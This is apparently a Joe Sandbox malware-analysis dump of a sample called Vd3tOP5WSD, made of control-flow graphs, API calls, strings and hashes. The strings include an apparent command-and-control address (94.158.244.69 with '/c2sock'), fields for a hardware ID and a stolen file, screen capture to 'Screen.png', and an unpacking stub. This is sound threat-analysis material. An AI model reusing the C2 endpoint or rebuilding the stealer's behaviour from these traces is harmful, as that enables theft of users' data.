41a58e-41a593 5860->5901 5861->5813 5876 41a9cd-41a9d5 5862->5876 5877 41a9ec-41aa15 5862->5877 5863->5813 5885 41a71b-41a722 5863->5885 5864->5813 5886 41a9d7-41a9da 5865->5886 5887 41a43a-41a43f 5865->5887 5902 41a5bb-41a5c0 5866->5902 5903 41a90e-41a931 call 447e2f 5866->5903 5867->5813 5868->5813 5888 41a7f3-41a809 5869->5888 5889 41a479-41a47e 5869->5889 5870->5813 5905 41a5e1-41a5e8 5871->5905 5906 41aa30-41aa35 5871->5906 5907 41a73a-41a748 5872->5907 5908 41a30d-41a312 5872->5908 5873->5813 5874->5891 5904 41a972 5874->5904 5875->5813 5910 41a603-41a625 5875->5910 5876->5861 5876->5886 5913 41aa17 5877->5913 5914 41aa1c-41aa1f 5877->5914 5936 41a650-41a69c call 41aa49 * 3 5878->5936 5879->5891 5921 41a78d-41a792 5879->5921 5880->5813 5915 41a383-41a3b5 call 41592c call 41900a 5880->5915 5881->5813 5882->5813 5883->5813 5918 41a3fc-41a409 5883->5918 5884->5813 5885->5813 5912 41a9db 5886->5912 5887->5813 5919 41a445-41a453 5887->5919 5888->5813 5889->5813 5922 41a484-41a4a8 call 41604a 5889->5922 5890->5891 5891->5813 5893->5813 5894->5813 5924 41a4e4-41a4f2 5894->5924 5895->5813 5925 41a523-41a526 call 447a80 5895->5925 5896->5891 5926 41a87c-41a881 5896->5926 5898->5891 5929 41a8ec-41a8f1 5898->5929 5899->5813 5928 41a566-41a573 5899->5928 5900->5813 5901->5813 5930 41a599-41a5a0 5901->5930 5902->5877 5932 41a5c6 5902->5932 5903->5813 5904->5891 5905->5813 5906->5813 5916 41aa3b-41aa48 5906->5916 5907->5891 5920 41a74e-41a753 5907->5920 5908->5813 5933 41a314-41a331 5908->5933 5910->5891 5935 41a62b-41a630 5910->5935 5912->5912 5913->5914 5914->5813 5915->5891 5957 41a3bb-41a3c0 5915->5957 5918->5813 5919->5813 5920->5891 5921->5891 5922->5891 5953 41a4ae-41a4b3 5922->5953 5924->5813 5949 41a52b-41a535 5925->5949 5926->5891 5928->5813 5929->5891 5930->5813 5932->5813 5933->5891 5944 41a337-41a33c 5933->5944 5934->5813 5935->5891 5936->5813 5944->5891 5948->5813 5949->5813 5950->5813 5953->5891 5957->5891
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _wctomb_s
                                                            • String ID: /c2sock$94.158.244.69$GhYuIq$file$hwid$lid$pid
                                                            • API String ID: 2865277502-1332857675
                                                            • Opcode ID: eb0b6a858b081c0f0339ece4a3e91829cc041cf882a78251da46bd4ef4ec5e2d
                                                            • Instruction ID: cc35308ceb474d8d45e9bf1619109491d7752d3a10985d79ac983763bc7ee506
                                                            • Opcode Fuzzy Hash: eb0b6a858b081c0f0339ece4a3e91829cc041cf882a78251da46bd4ef4ec5e2d
                                                            • Instruction Fuzzy Hash: 11F108B5D0211A9BDF248B88C8455FEBAB1AB14340F24496BE415F7394D33DCAE18B9F

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 6109 99003c-990047 6110 990049 6109->6110 6111 99004c-990263 call 990a3f call 990e0f call 990d90 VirtualAlloc 6109->6111 6110->6111 6126 99028b-990292 6111->6126 6127 990265-990289 call 990a69 6111->6127 6129 9902a1-9902b0 6126->6129 6131 9902ce-9903c2 VirtualProtect call 990cce call 990ce7 6127->6131 6129->6131 6132 9902b2-9902cc 6129->6132 6138 9903d1-9903e0 6131->6138 6132->6129 6139 990439-9904b8 VirtualFree 6138->6139 6140 9903e2-990437 call 990ce7 6138->6140 6142 9904be-9904cd 6139->6142 6143 9905f4-9905fe 6139->6143 6140->6138 6145 9904d3-9904dd 6142->6145 6146 99077f-990789 6143->6146 6147 990604-99060d 6143->6147 6145->6143 6151 9904e3-990505 LoadLibraryA 6145->6151 6149 99078b-9907a3 6146->6149 6150 9907a6-9907b0 6146->6150 6147->6146 6152 990613-990637 6147->6152 6149->6150 6153 99086e-9908be LoadLibraryA 6150->6153 6154 9907b6-9907cb 6150->6154 6155 990517-990520 6151->6155 6156 990507-990515 6151->6156 6157 99063e-990648 6152->6157 6161 9908c7-9908f9 6153->6161 6158 9907d2-9907d5 6154->6158 6159 990526-990547 6155->6159 6156->6159 6157->6146 6160 99064e-99065a 6157->6160 6162 990824-990833 6158->6162 6163 9907d7-9907e0 6158->6163 6164 99054d-990550 6159->6164 6160->6146 6165 990660-99066a 6160->6165 6168 9908fb-990901 6161->6168 6169 990902-99091d 6161->6169 6167 990839-99083c 6162->6167 6170 9907e2 6163->6170 6171 9907e4-990822 6163->6171 6172 9905e0-9905ef 6164->6172 6173 990556-99056b 6164->6173 6166 99067a-990689 6165->6166 6176 99068f-9906b2 6166->6176 6177 990750-99077a 6166->6177 6167->6153 6178 99083e-990847 6167->6178 6168->6169 6170->6162 6171->6158 6172->6145 6174 99056d 6173->6174 6175 99056f-99057a 6173->6175 6174->6172 6179 99059b-9905bb 6175->6179 6180 99057c-990599 6175->6180 6181 9906ef-9906fc 6176->6181 6182 9906b4-9906ed 6176->6182 6177->6157 6183 990849 6178->6183 6184 99084b-99086c 6178->6184 6192 9905bd-9905db 6179->6192 6180->6192 6186 99074b 6181->6186 6187 9906fe-990748 6181->6187 6182->6181 6183->6153 6184->6167 6186->6166 6187->6186 6192->6164
                                                            APIs
                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0099024D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID: cess$kernel32.dll
                                                            • API String ID: 4275171209-1230238691
                                                            • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                            • Instruction ID: cd4b7741529196e3b900c45689e90016cd92319ae4b5bb5a884e835b5848cf64
                                                            • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                            • Instruction Fuzzy Hash: F5527874A01229DFDB64CF98C984BACBBB5BF49304F1480D9E95DAB251DB30AE84DF14

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 6334 432718-43272b 6335 43272e-432736 6334->6335 6336 432771-432776 6335->6336 6337 432738-43273d 6335->6337 6340 432821-432826 6336->6340 6341 43277c-432781 6336->6341 6338 432743-432748 6337->6338 6339 4327f0-4327f5 6337->6339 6342 432872-432877 6338->6342 6343 43274e-432753 6338->6343 6344 4327fb-432800 6339->6344 6345 4328e9-4328ee 6339->6345 6346 432910-432915 6340->6346 6347 43282c-432831 6340->6347 6348 432787-43278c 6341->6348 6349 4328a9-4328ae 6341->6349 6352 432a76-432a8d CreateCompatibleBitmap 6342->6352 6353 43287d-432882 6342->6353 6354 432979-43298f 6343->6354 6355 432759-43275e 6343->6355 6356 432806-43280b 6344->6356 6357 4329fc-432a09 6344->6357 6362 4328f4-4328f9 6345->6362 6363 432ace-432adf 6345->6363 6350 432ae4-432aeb 6346->6350 6351 43291b-432920 6346->6351 6360 432837-43283c 6347->6360 6361 432a26-432a52 BitBlt 6347->6361 6364 432792-432797 6348->6364 6365 4329d8-4329eb 6348->6365 6358 4328b0-4328b5 6349->6358 6359 4328d6-4328e4 6349->6359 6350->6335 6351->6335 6377 432926-432934 6351->6377 6352->6335 6368 432a92-432abf call 4338b5 call 43350d 6353->6368 6369 432888-43288d 6353->6369 6354->6335 6370 432994-4329d3 call 430e6c * 2 6355->6370 6371 432764-432769 6355->6371 6378 432811-432816 6356->6378 6379 432a0e-432a21 SelectObject 6356->6379 6357->6335 6372 432af0-432af5 6358->6372 6373 4328bb-4328c6 6358->6373 6359->6335 6380 432842-432847 6360->6380 6381 432a5b-432a71 SelectObject 6360->6381 6366 432ac6-432ac9 6361->6366 6367 432a54-432a59 6361->6367 6362->6335 6374 4328ff-43290b 6362->6374 6363->6335 6375 4329f0-4329f7 6364->6375 6376 43279d-4327a2 6364->6376 6365->6335 6366->6335 6367->6366 6368->6366 6409 432ac1 6368->6409 6369->6335 6384 432893-4328a4 CreateCompatibleDC 6369->6384 6370->6335 6385 432943-432946 6371->6385 6386 43276f 6371->6386 6372->6335 6388 432afb-432b1a DeleteDC DeleteObject 6372->6388 6373->6385 6387 4328c8-4328d0 6373->6387 6374->6335 6375->6335 6376->6335 6389 4327a4-4327e0 call 4338b5 call 432718 6376->6389 6390 432936 6377->6390 6391 43293b-43293e 6377->6391 6393 43295b-432974 6378->6393 6394 43281c 6378->6394 6379->6335 6380->6335 6382 43284d-432863 call 432b1b 6380->6382 6381->6335 6404 432865 6382->6404 6405 43286a-43286d 6382->6405 6384->6335 6398 432947 6385->6398 6386->6335 6387->6359 6387->6393 6389->6366 6411 4327e6-4327eb 6389->6411 6390->6391 6391->6366 6393->6335 6394->6335 6398->6398 6404->6405 6405->6366 6409->6366 6411->6366
                                                            APIs
                                                            • CreateCompatibleDC.GDI32(00000D62), ref: 00432894
                                                            • DeleteDC.GDI32(00000002), ref: 00432B01
                                                            • DeleteObject.GDI32(?), ref: 00432B0A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Delete$CompatibleCreateObject
                                                            • String ID:
                                                            • API String ID: 1022343127-0
                                                            • Opcode ID: 9c86189b810d3e515d08f5d9a84ca5729e654e6d330d14ecc6a0223a2e2684ea
                                                            • Instruction ID: 50fedbdf880eafc0b33480be7e0390951b775b57d16ab65b209ae7f2f2027e24
                                                            • Opcode Fuzzy Hash: 9c86189b810d3e515d08f5d9a84ca5729e654e6d330d14ecc6a0223a2e2684ea
                                                            • Instruction Fuzzy Hash: 358116B590031A9BDF209F948EC557E7A74BB0C350F282617E510F63A0D3FD9A419BAB

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 6412 44cf15-44cf21 6413 44cfb3-44cfb6 6412->6413 6414 44cf26-44cf37 6413->6414 6415 44cfbc 6413->6415 6417 44cf44-44cf5d LoadLibraryExW 6414->6417 6418 44cf39-44cf3c 6414->6418 6416 44cfbe-44cfc2 6415->6416 6421 44cfc3-44cfd3 6417->6421 6422 44cf5f-44cf68 GetLastError 6417->6422 6419 44cf42 6418->6419 6420 44cfdc-44cfde 6418->6420 6424 44cfb0 6419->6424 6420->6416 6421->6420 6423 44cfd5-44cfd6 FreeLibrary 6421->6423 6425 44cfa1-44cfae 6422->6425 6426 44cf6a-44cf7c call 4516ce 6422->6426 6423->6420 6424->6413 6425->6424 6426->6425 6429 44cf7e-44cf90 call 4516ce 6426->6429 6429->6425 6432 44cf92-44cf9f LoadLibraryExW 6429->6432 6432->6421 6432->6425
                                                            APIs
                                                            • FreeLibrary.KERNEL32(00000000,?,0044D022,?,00426F52,00000000,00000000,?,?,0044CDD6,00000021,FlsSetValue,0046503C,FlsSetValue,00000000), ref: 0044CFD6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID: api-ms-$ext-ms-
                                                            • API String ID: 3664257935-537541572
                                                            • Opcode ID: 6740c229368fb351fb4ec7fc524e13049988398a7c5dabcb7bff3fed9ad9b5d0
                                                            • Instruction ID: c6a9518bbc4403065455c8dc6532f837efe444071a0c6fa5154c8577c36c6d79
                                                            • Opcode Fuzzy Hash: 6740c229368fb351fb4ec7fc524e13049988398a7c5dabcb7bff3fed9ad9b5d0
                                                            • Instruction Fuzzy Hash: 4521EE31E47210ABEB219B65DCC0A5B77699B41764B190122FD05A73D0FBBCDD08C6DD

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 6676 44575f-445778 6678 44578d-44579d 6676->6678 6679 44577a-44578b call 4447a4 call 44e2f7 6676->6679 6681 4457b2-4457b8 6678->6681 6682 44579f-4457b0 call 4447a4 call 44e2f7 6678->6682 6701 4457e0-4457e2 6679->6701 6683 4457c0-4457c6 6681->6683 6684 4457ba 6681->6684 6703 4457df 6682->6703 6689 4457e3 call 453aae 6683->6689 6690 4457c8 6683->6690 6687 4457d2-4457dc call 4447a4 6684->6687 6688 4457bc-4457be 6684->6688 6704 4457de 6687->6704 6688->6683 6688->6687 6698 4457e8-4457fd call 453711 6689->6698 6690->6687 6694 4457ca-4457d0 6690->6694 6694->6687 6694->6689 6706 445803-44580f call 45373d 6698->6706 6707 4459ee-4459f8 call 44e307 6698->6707 6703->6701 6704->6703 6706->6707 6712 445815-445821 call 453769 6706->6712 6712->6707 6715 445827-44583c 6712->6715 6716 4458ac-4458b7 call 4537d0 6715->6716 6717 44583e 6715->6717 6716->6704 6723 4458bd-4458c8 6716->6723 6719 445840-445846 6717->6719 6720 445848-445864 call 4537d0 6717->6720 6719->6716 6719->6720 6720->6704 6727 44586a-44586d 6720->6727 6725 4458e4 6723->6725 6726 4458ca-4458d3 call 453a5a 6723->6726 6728 4458e7-4458fb call 4543d0 6725->6728 6726->6725 6737 4458d5-4458e2 6726->6737 6729 4459e7-4459e9 6727->6729 6730 445873-44587c call 453a5a 6727->6730 6738 4458fd-445905 6728->6738 6739 445908-44592f call 4527e0 call 4543d0 6728->6739 6729->6704 6730->6729 6740 445882-44589a call 4537d0 6730->6740 6737->6728 6738->6739 6748 445931-44593a 6739->6748 6749 44593d-445964 call 4527e0 call 4543d0 6739->6749 6740->6704 6745 4458a0-4458a7 6740->6745 6745->6729 6748->6749 6754 445966-44596f 6749->6754 6755 445972-445981 call 4527e0 6749->6755 6754->6755 6758 445983 6755->6758 6759 4459a9-4459c7 6755->6759 6760 445985-445987 6758->6760 6761 445989-44599d 6758->6761 6762 4459e4 6759->6762 6763 4459c9-4459e2 6759->6763 6760->6761 6764 44599f-4459a1 6760->6764 6761->6729 6762->6729 6763->6729 6764->6729 6765 4459a3 6764->6765 6765->6759 6766 4459a5-4459a7 6765->6766 6766->6729 6766->6759
                                                            APIs
                                                            • __allrem.LIBCMT ref: 004458F2
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0044590E
                                                            • __allrem.LIBCMT ref: 00445925
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00445943
                                                            • __allrem.LIBCMT ref: 0044595A
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00445978
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                            • String ID:
                                                            • API String ID: 1992179935-0
                                                            • Opcode ID: 6914c5dd9646aa3fd790727cf4e39c2290796d50bc97961f3513338c227282f2
                                                            • Instruction ID: 558deed22b9213933cb6ee14014e535275a7d7dbd354c33e6b5693a62e892da8
                                                            • Opcode Fuzzy Hash: 6914c5dd9646aa3fd790727cf4e39c2290796d50bc97961f3513338c227282f2
                                                            • Instruction Fuzzy Hash: 0681D8B1600B06DBFB20AE29CC42B5BB3E9AF54768F24452FE411D67C3E778D9058B58
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 9a%^$M%$Screen.png
                                                            • API String ID: 0-2021954137
                                                            • Opcode ID: 7ea333df6f5c2910ca2bc4c4f4777871bdb5a703dffbbcdfcf0a34b6d9d0a0f5
                                                            • Instruction ID: 11fefa64aaa65e2afc3480572e0d96af9cd0f56f536a59b59af3bc8bd9e58722
                                                            • Opcode Fuzzy Hash: 7ea333df6f5c2910ca2bc4c4f4777871bdb5a703dffbbcdfcf0a34b6d9d0a0f5
                                                            • Instruction Fuzzy Hash: 4691D8B6E005098ADF248E98888557EB6B4AB9C312F647917E416FB390E37CCF41875B
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00402FE0
                                                            • LoadLibraryA.KERNELBASE(my-global-render.dll), ref: 00402FEA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: LibraryLoad
                                                            • String ID: advapi32.dll$my-global-render.dll
                                                            • API String ID: 1029625771-772900288
                                                            • Opcode ID: 925eec738fb8ed2f48ee2fb466019044b8b010c49f75685c643bb3b93b1091e7
                                                            • Instruction ID: f2405b5e0aceb9a51e137d87bf907524102569514c3531be8be57496d61f3bc2
                                                            • Opcode Fuzzy Hash: 925eec738fb8ed2f48ee2fb466019044b8b010c49f75685c643bb3b93b1091e7
                                                            • Instruction Fuzzy Hash: 6BA1F872D0412A86CF64CE98994527E6E78BB10351F250A3BE915FA3D0C7BCCF41A79B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ^^4$^^4$~rjz
                                                            • API String ID: 0-2511145224
                                                            • Opcode ID: e0c7894fc243b6b43147b7a10468ae5ae2dedb06c2c8e31032a7761496933ed1
                                                            • Instruction ID: fe384b451c266d20576388885646b2b98754c57df49fd09348afa64f247ec54d
                                                            • Opcode Fuzzy Hash: e0c7894fc243b6b43147b7a10468ae5ae2dedb06c2c8e31032a7761496933ed1
                                                            • Instruction Fuzzy Hash: 9E618C72E0011947EF287D4888855BEB7919B88B1AF342927F115FB391C76C8F4D974B
                                                            APIs
                                                            • GetTimeZoneInformation.KERNELBASE(00000000,00000000,00000000,00454058,004170BE,?), ref: 00453C36
                                                              • Part of subcall function 00453203: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,0045769E,?,00000000,-00000008), ref: 004532AF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ByteCharInformationMultiTimeWideZone
                                                            • String ID: Eastern Standard Time$Eastern Summer Time
                                                            • API String ID: 1123094072-239921721
                                                            • Opcode ID: caf58cafb60ec3060b2a5cf257d1c9c7a73c601415e76bdfbbd359845a8db1e6
                                                            • Instruction ID: af1a61733d26d89116c9bb65ccd9636383a7b5e966e3c510a6c9de8ec0de26fa
                                                            • Opcode Fuzzy Hash: caf58cafb60ec3060b2a5cf257d1c9c7a73c601415e76bdfbbd359845a8db1e6
                                                            • Instruction Fuzzy Hash: FC4199B2D00115BBDB106FA6DC46A5ABF78EF04396F10406BFD04A7162E7789F148B99
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(0044387B,?,00443A9B,00000000,?,?,0044387B,DCFB3585,?,0044387B), ref: 004439CB
                                                            • TerminateProcess.KERNEL32(00000000,?,00443A9B,00000000,?,?,0044387B,DCFB3585,?,0044387B), ref: 004439D2
                                                            • ExitProcess.KERNEL32 ref: 004439E4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Process$CurrentExitTerminate
                                                            • String ID:
                                                            • API String ID: 1703294689-0
                                                            • Opcode ID: 781b962f5f028f3a025d91418773fc66c46a7b9eca303b4a2ef1248f55b92173
                                                            • Instruction ID: af00403c123718aebf8df8255158ed5eb80799a0d3dec5c869f97e29736db2e2
                                                            • Opcode Fuzzy Hash: 781b962f5f028f3a025d91418773fc66c46a7b9eca303b4a2ef1248f55b92173
                                                            • Instruction Fuzzy Hash: 7ED09E71404115BBEF113F61DC0E9593F2AAF40787B144029F90596132DFF59E51DB99
                                                            APIs
                                                            • GetCurrentHwProfileA.ADVAPI32(00000000,?,?,0041A650), ref: 0041D07D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CurrentProfile
                                                            • String ID: advapi32.dll
                                                            • API String ID: 2104809126-4050573280
                                                            • Opcode ID: 47e41008aad65778580e0c35056873463c47f4eed791b1223cc5fbeb135fea17
                                                            • Instruction ID: 6db1735cda00ed3d220bfaf1cacc4b3e5e01bff1461a9ef13bbd23f8b442f0e3
                                                            • Opcode Fuzzy Hash: 47e41008aad65778580e0c35056873463c47f4eed791b1223cc5fbeb135fea17
                                                            • Instruction Fuzzy Hash: 9BF0E9F3D4013126F61025AA5C01ABB7E888B46729F140177FD0CE6281E21E9D8242EA
                                                            APIs
                                                            • RtlFreeHeap.NTDLL(00000000,00000000,?,00447A98,00426F52,?,?), ref: 0044E23A
                                                            • GetLastError.KERNEL32(?,?,00447A98,00426F52,?,?), ref: 0044E245
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 485612231-0
                                                            • Opcode ID: 5ab3d534c7926ab7bd1f653ef6df7c72235af480dfd0cba9c2c881dd6ec4968b
                                                            • Instruction ID: f015b3b87cbc766378ce5f0d68a15eb43446f93644205f51174f0ce78f182e30
                                                            • Opcode Fuzzy Hash: 5ab3d534c7926ab7bd1f653ef6df7c72235af480dfd0cba9c2c881dd6ec4968b
                                                            • Instruction Fuzzy Hash: 3AE08631100214ABEF112BA2AD0AB5A3B9CBF80355F104065F60896161EBB88850C7DD
                                                            APIs
                                                            • SetErrorMode.KERNELBASE(00000400,?,?,00990223,?,?), ref: 00990E19
                                                            • SetErrorMode.KERNELBASE(00000000,?,?,00990223,?,?), ref: 00990E1E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorMode
                                                            • String ID:
                                                            • API String ID: 2340568224-0
                                                            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                            • Instruction ID: 47455b4d9e8784be7886e97fbbdae7242364080e5199662cd228575d61da8e96
                                                            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                            • Instruction Fuzzy Hash: 63D0123514512877DB002AD8DC09BCD7B1CDF05B62F008411FB0DD9080C770994046E5
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _strlen
                                                            • String ID:
                                                            • API String ID: 4218353326-0
                                                            • Opcode ID: 4e1718403e1c9f4dc854db183ebccdab995ea214547ce8d1c5d4ce7d2dfc11b0
                                                            • Instruction ID: 1d70213f864448114667fa93143398f689e43ce09380febb34e55b8e9c3c6d32
                                                            • Opcode Fuzzy Hash: 4e1718403e1c9f4dc854db183ebccdab995ea214547ce8d1c5d4ce7d2dfc11b0
                                                            • Instruction Fuzzy Hash: AEC1ECB1A05B009FD724CF29C88166BFBE5FF88314F14892EE5AA83750E774E845CB56
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0a8d065c2e7d1e5bd55c3a73d0c85b8c9c2db864d3e8117d795f012447403357
                                                            • Instruction ID: 373710123005f16d466fbf61102d91235a16be84b9ed3eb2ab6254e0a7e141d7
                                                            • Opcode Fuzzy Hash: 0a8d065c2e7d1e5bd55c3a73d0c85b8c9c2db864d3e8117d795f012447403357
                                                            • Instruction Fuzzy Hash: B6016D33B001145FBF11CE69EC4595B3796EBC1328B244132F904CB185FB39CC028389
                                                            APIs
                                                              • Part of subcall function 0044EB6F: RtlAllocateHeap.NTDLL(00000000,00426DF1,?,?,00426DF1,?), ref: 0044EBA1
                                                            • RtlReAllocateHeap.NTDLL(00000000,00000000,00413871,00000000,00000000,00000000,00413871,00000000,00000000,7626F770,?,0041A136,00001FE6,00003CA7,?,000016E5), ref: 004569FC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: a0eecb7647cd985660cbc4ebe15971cfc3f9a0df64ec6594d00528a4e276af4a
                                                            • Instruction ID: a5a40cd43560794f83e54c6bbfcb227c9197063c5c667a14a31a2b77de81b9f8
                                                            • Opcode Fuzzy Hash: a0eecb7647cd985660cbc4ebe15971cfc3f9a0df64ec6594d00528a4e276af4a
                                                            • Instruction Fuzzy Hash: 80F0C8B110011576AB212A279C01B6B276C9FC1B76F56013FFC1497293EE7C9809C29E
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0044D36A,00000001,00000364,00000000,00000008,000000FF,?,00447A98,00426F52,?,?), ref: 00450371
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 9d9d3e8b2bef017808805eba958564c636c8c3ec0520770245b5987c827fdf69
                                                            • Instruction ID: 035a614d3876f6906020b157cdd10206fdefeae5334def747215f66390aa104c
                                                            • Opcode Fuzzy Hash: 9d9d3e8b2bef017808805eba958564c636c8c3ec0520770245b5987c827fdf69
                                                            • Instruction Fuzzy Hash: BBF05939200620A7AB205B728C01B6B3758AF81772B044127FC08DA282DA38DC09C6EE
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,00426DF1,?,?,00426DF1,?), ref: 0044EBA1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
